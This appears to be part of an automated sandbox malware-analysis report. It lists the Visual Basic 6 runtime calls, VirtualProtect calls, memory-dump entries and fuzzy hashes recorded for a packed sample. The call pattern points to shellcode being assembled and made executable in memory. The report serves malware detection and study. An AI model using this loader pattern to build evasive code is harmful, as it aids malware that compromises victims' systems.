                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?), ref: 0054E9D8
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?), ref: 0054E9E2
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?), ref: 0054E9E8
                                                                    • VirtualProtect.KERNELBASE(0040A2AC,00000000,00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC), ref: 0054E9F6
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0040A2AC,0040A2BC,0000002C), ref: 0054EA11
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054EA23
                                                                    • __vbaFreeStr.MSVBVM60(?), ref: 0054EA2B
                                                                    • #644.MSVBVM60(0057F2B0,?), ref: 0054EA39
                                                                    • __vbaStrCat.MSVBVM60(0040AA60,0040AA58,0057F2B0,?), ref: 0054EA4B
                                                                    • __vbaStrMove.MSVBVM60(0040AA60,0040AA58,0057F2B0,?), ref: 0054EA55
                                                                    • __vbaStrCat.MSVBVM60(0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA60
                                                                    • #638.MSVBVM60(00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA7D
                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA90
                                                                    • __vbaFreeVar.MSVBVM60(00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA98
                                                                    • __vbaAryLock.MSVBVM60(?,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EAD8
                                                                    • #644.MSVBVM60(?,?,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EAF0
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EAFC
                                                                    • #644.MSVBVM60(0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EB21
                                                                    • #644.MSVBVM60(0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EB43
                                                                    • #644.MSVBVM60(10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0), ref: 0054EB65
                                                                    • #644.MSVBVM60(2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000), ref: 0054EB87
                                                                    • #644.MSVBVM60(00000000,0040A2BC,0040A2AC,2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000), ref: 0054EBA6
                                                                    • #644.MSVBVM60(?,0040A2BC,0040A2A8,00000000,0040A2BC,0040A2AC,2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF), ref: 0054EBD8
                                                                    • #644.MSVBVM60(00000000,?,0040A2BC,0040A2A8,00000000,0040A2BC,0040A2AC,2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8), ref: 0054EBE4
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0040A2AC,0040A2BC,00000020), ref: 0054EC30
                                                                    • __vbaAryLock.MSVBVM60(?,00000000), ref: 0054EC79
                                                                    • #644.MSVBVM60(?,?,00000000), ref: 0054EC91
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000000), ref: 0054EC9D
                                                                    • #644.MSVBVM60(?,00000000), ref: 0054ECBB
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054ED0B,00000000,0040A2BC,?,00000000), ref: 0054ECFD
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0054ED0B,00000000,0040A2BC,?,00000000), ref: 0054ED05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Free$LockUnlock$AddrefCheckHresultMove$#638CastChkstkDestructProtectRedimVirtual
                                                                    • String ID: @$hW
                                                                    • API String ID: 265859740-140651850
                                                                    • Opcode ID: a1bb3d0061758154b8bfe0a1f7d7646081a2f7521e0348a24d6c14aa9fc3d1dc
                                                                    • Instruction ID: 7669973d0e9846490f9b776014c01caf568f332edc960939a8aab0d750e8df83
                                                                    • Opcode Fuzzy Hash: a1bb3d0061758154b8bfe0a1f7d7646081a2f7521e0348a24d6c14aa9fc3d1dc
                                                                    • Instruction Fuzzy Hash: 4B02C8B5D402099FDF04EFE5C985EDEBBB8FF08308F10452AF501BB2A1DA3999059B65

                                                                    Control-flow Graph

                                                                    • [Control-flow graph not reproduced. Legend: Executed / Not Executed. First block: 57c62d-57c663, __vbaChkstk]
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0057C60D), ref: 0057C64A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,0000000A,?,00000000,00401006,?,?,?,0057C60D), ref: 0057C66F
                                                                    • __vbaNew2.MSVBVM60(00408448,0057F314), ref: 0057C6A8
                                                                    • __vbaObjSetAddref.MSVBVM60(00401006,?), ref: 0057C6CF
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C6F8
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 0057C70F
                                                                    • __vbaAryLock.MSVBVM60(?,0057F320), ref: 0057C74A
                                                                    • #644.MSVBVM60(?,?,0057F320), ref: 0057C760
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0057F320), ref: 0057C76C
                                                                    • __vbaObjSet.MSVBVM60(00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C79D
                                                                    • __vbaObjSetAddref.MSVBVM60(0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7AC
                                                                    • __vbaFreeObj.MSVBVM60(0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7B4
                                                                    • __vbaObjSetAddref.MSVBVM60(00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7C5
                                                                    • #644.MSVBVM60(00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7CB
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057C7D9
                                                                    • __vbaObjSetAddref.MSVBVM60(00401006,00000000,0057F318,0057F2E8,00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?), ref: 0057C818
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00401006,00000000,0057F318,0057F2E8,00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?), ref: 0057C82D
                                                                    • __vbaAryUnlock.MSVBVM60(?,0057D0D3,00000000,00401006,00000000,0057F31C,00000000,00401006,00000000,?,?,00000000,?,?,?,0057F320), ref: 0057D0CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$AddrefFree$#644New2Unlock$CheckChkstkHresultLock
                                                                    • String ID:
                                                                    • API String ID: 452095399-0
                                                                    • Opcode ID: 5ee6c31ba54d2ccb82314373c12b7eea726bc6b663a35b91111638c8f2cea951
                                                                    • Instruction ID: 5b70c70bdb4acf05965a8b5bbfeebf3b5dfcab051965810b139fbf24b8ba5b45
                                                                    • Opcode Fuzzy Hash: 5ee6c31ba54d2ccb82314373c12b7eea726bc6b663a35b91111638c8f2cea951
                                                                    • Instruction Fuzzy Hash: C16209719002099FDB50EBA9DD85BDDBBB8BF08304F50416AF209FB2A2DB34D985DB15

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054B96E,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054EE5D
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401006,?,?,?,0054B96E), ref: 0054EE82
                                                                    • __vbaNew.MSVBVM60(0040A2AC,0040A2BC), ref: 0054EE94
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,0040A2AC,0040A2BC), ref: 0054EE9E
                                                                    • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEA4
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEAE
                                                                    • __vbaObjSetAddref.MSVBVM60(0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEBD
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EECC
                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE0
                                                                    • #644.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE6
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEF1
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054EF37
                                                                    • #644.MSVBVM60(?,?,?), ref: 0054EF4F
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054EF5B
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,00000000), ref: 0054EF80
                                                                    • #644.MSVBVM60(00000000,00000000,00000000), ref: 0054EF86
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,00000000), ref: 0054EF91
                                                                    • #644.MSVBVM60(0040A2AC,00000000,00000000,00000000), ref: 0054EF9A
                                                                    • __vbaAryLock.MSVBVM60(?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFAF
                                                                    • #644.MSVBVM60(?,?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFC6
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFD2
                                                                    • #644.MSVBVM60(?,?,?,?,?,00000000,00000000,0040A2AC,00000000,00000000,00000000), ref: 0054EFE1
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,0040A2BC,00000003,00000001,00000010,00000000,?,00000000,?,?,?,?,?,00000000,00000000), ref: 0054F01F
                                                                    • #644.MSVBVM60(?,?,?,00000000,00000000,00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054F02B
                                                                    • #644.MSVBVM60(00000040), ref: 0054F04C
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,?,0040A2B0,00000040), ref: 0054F072
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F097
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F0A1
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F0A7
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,?,0040A2B0,00000040), ref: 0054F0C1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A2BC,0000002C), ref: 0054F0E1
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054F0F3
                                                                    • __vbaFreeStr.MSVBVM60(?), ref: 0054F0FB
                                                                    • #644.MSVBVM60(?,?), ref: 0054F104
                                                                    • __vbaStrCat.MSVBVM60(0040AA60,0040AA58,?,?), ref: 0054F116
                                                                    • __vbaStrMove.MSVBVM60(0040AA60,0040AA58,?,?), ref: 0054F120
                                                                    • __vbaStrCat.MSVBVM60(0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F12B
                                                                    • #638.MSVBVM60(00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F145
                                                                    • __vbaFreeStr.MSVBVM60(00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F158
                                                                    • __vbaFreeVar.MSVBVM60(00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F160
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F19B
                                                                    • #644.MSVBVM60(?,?,0040A2BC,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F1B3
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0040A2BC,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F1BF
                                                                    • #644.MSVBVM60(0424448B,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F1E4
                                                                    • #644.MSVBVM60(408B008B,-00000004,?,00000004,0424448B,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60,0040AA58,?,?), ref: 0054F208
                                                                    • #644.MSVBVM60(20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A2BC,00000000,0040A2BC,00000008,0040AC74,00000000,0040AA60), ref: 0054F22C
                                                                    • #644.MSVBVM60(E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004,0424448B,0040A2BC,00000000,0040A2BC), ref: 0054F250
                                                                    • #644.MSVBVM60(0000E0FF,-00000010,?,00000004,E02474FF,-0000000C,?,00000004,20C4832C,-00000008,?,00000004,408B008B,-00000004,?,00000004), ref: 0054F274
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,-00000014,?,00000004,0000E0FF,-00000010), ref: 0054F2D7
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A2BC,00000020), ref: 0054F2F7
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,0040A2BC), ref: 0054F341
                                                                    • #644.MSVBVM60(?,?,0040A2BC,0040A2BC), ref: 0054F359
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,0040A2BC,0040A2BC), ref: 0054F365
                                                                    • #644.MSVBVM60(0040A2AC,0040A2BC), ref: 0054F383
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054F3E0,0000E0FF,00000000,0040A2AC,0040A2BC), ref: 0054F3CF
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,0040A2BC,00000000,?,0054F3E0,0000E0FF,00000000,0040A2AC,0040A2BC), ref: 0054F3DA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Free$LockUnlock$Addref$CheckDestructHresultMoveProtectRedimVirtual$#638CastChkstkList
                                                                    • String ID: @
                                                                    • API String ID: 1659925571-2766056989
                                                                    • Opcode ID: 546dd4561fb5e0cddda09a067700fe8852273202ed3fce2f30aa315b787fbda3
                                                                    • Instruction ID: 58188ec10928086fb90cd05e538dca631ba5c27e21bfc80d5300524514002e27
                                                                    • Opcode Fuzzy Hash: 546dd4561fb5e0cddda09a067700fe8852273202ed3fce2f30aa315b787fbda3
                                                                    • Instruction Fuzzy Hash: D202EBB5D40209AFDF04EFE4D985EEEBBB8FF08308F10442AF601BB291D67999449B54

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D6F6
                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D70E
                                                                    • __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D714
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D71E
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D751
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,0000001C,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D793
                                                                    • __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D7AC
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF), ref: 0054D7C0
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006), ref: 0054D7DE
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D801
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,0000001C), ref: 0054D843
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054D85C
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054D870
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054D88E
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D8B1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,00000020), ref: 0054D8F3
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000000), ref: 0054D90C
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000000), ref: 0054D920
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000000), ref: 0054D93E
                                                                    • __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D961
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,00000020), ref: 0054D9A3
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000018,00000008), ref: 0054D9BC
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,?,00000018,00000008), ref: 0054D9D0
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000,?,?,00000018,00000008), ref: 0054D9EE
                                                                    • __vbaSetSystemError.MSVBVM60(?,00008003,00000000,00000000,?), ref: 0054DA18
                                                                    • __vbaLenBstr.MSVBVM60(?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA22
                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA2F
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA40
                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,00000000,00000000,?,?,00000000,?,00000000,?,00008003,00000000,00000000,?), ref: 0054DA4C
                                                                    • __vbaFreeStr.MSVBVM60 ref: 0054DA63
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00006610,00000000,00000000,00000000), ref: 0054DA81
                                                                    • __vbaAryLock.MSVBVM60(?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054DA8F
                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054DAB7
                                                                    • __vbaAryUnlock.MSVBVM60(?,00000000,00000000,00000001,00000000,?,00000000,?,?,00000000,00006610,00000000,00000000,00000000), ref: 0054DAC0
                                                                    • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 0054DADA
                                                                    • __vbaFreeObj.MSVBVM60(0054DB1B,?,00000000), ref: 0054DB0D
                                                                    • __vbaFreeStr.MSVBVM60(0054DB1B,?,00000000), ref: 0054DB15
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$ErrorSystem$Free$Ansi$CheckHresultListNew2$BstrChkstkCopyLockMoveNofreePreserveRedimUnicodeUnlockVarg
                                                                    • String ID:
                                                                    • API String ID: 1357747868-0
                                                                    • Opcode ID: 7dc21813d9a4bf095005ce266a502b0cdacc1b0d5717a13fcc51496f7ea57067
                                                                    • Instruction ID: 6eba8aa71e126c827b71befec4c26177b9909ed4f3e53c437c078aa340996b94
                                                                    • Opcode Fuzzy Hash: 7dc21813d9a4bf095005ce266a502b0cdacc1b0d5717a13fcc51496f7ea57067
                                                                    • Instruction Fuzzy Hash: 42D1C271D4020DAEDF11EFE1C846BEEBBB9BF08704F10442AF601BA1A1D7789A45DB65

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054B901
                                                                    • #644.MSVBVM60(?,?,?,?,00401006), ref: 0054B919
                                                                    • #644.MSVBVM60(00000000,?,?,?,?,?,00401006), ref: 0054B93E
                                                                    • #644.MSVBVM60(?,?,-00000004,00000000,?,?,?,?,?,00401006), ref: 0054B95A
                                                                      • Part of subcall function 0054EE42: __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054B96E,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054EE5D
                                                                      • Part of subcall function 0054EE42: __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,?,?,00000000,00401006,?,?,?,0054B96E), ref: 0054EE82
                                                                      • Part of subcall function 0054EE42: __vbaNew.MSVBVM60(0040A2AC,0040A2BC), ref: 0054EE94
                                                                      • Part of subcall function 0054EE42: __vbaObjSet.MSVBVM60(?,00000000,0040A2AC,0040A2BC), ref: 0054EE9E
                                                                      • Part of subcall function 0054EE42: __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEA4
                                                                      • Part of subcall function 0054EE42: __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEAE
                                                                      • Part of subcall function 0054EE42: __vbaObjSetAddref.MSVBVM60(0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EEBD
                                                                      • Part of subcall function 0054EE42: __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0057F2AC,00000000,?,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054EECC
                                                                      • Part of subcall function 0054EE42: __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE0
                                                                      • Part of subcall function 0054EE42: #644.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEE6
                                                                      • Part of subcall function 0054EE42: __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040A2AC,0040A2BC), ref: 0054EEF1
                                                                      • Part of subcall function 0054EE42: __vbaAryLock.MSVBVM60(?,?), ref: 0054EF37
                                                                      • Part of subcall function 0054EE42: #644.MSVBVM60(?,?,?), ref: 0054EF4F
                                                                      • Part of subcall function 0054EE42: __vbaAryUnlock.MSVBVM60(?,?,?,?), ref: 0054EF5B
                                                                    • __vbaChkstk.MSVBVM60(?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B980
                                                                      • Part of subcall function 0054BC0E: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054BC2A
                                                                      • Part of subcall function 0054BC0E: __vbaVarDup.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC42
                                                                      • Part of subcall function 0054BC0E: #644.MSVBVM60(?,00000003,?,?,00401006), ref: 0054BC4D
                                                                      • Part of subcall function 0054BC0E: __vbaI4Var.MSVBVM60(?,00000000,?,00000003,?,?,00401006), ref: 0054BC57
                                                                      • Part of subcall function 0054BC0E: __vbaFreeVar.MSVBVM60(0054BD4A,00000000,?,00000000,?,00000002,?), ref: 0054BD44
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B99B
                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9A5
                                                                    • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,00000008,00000004,?,?,-00000004,00000000,?), ref: 0054B9AD
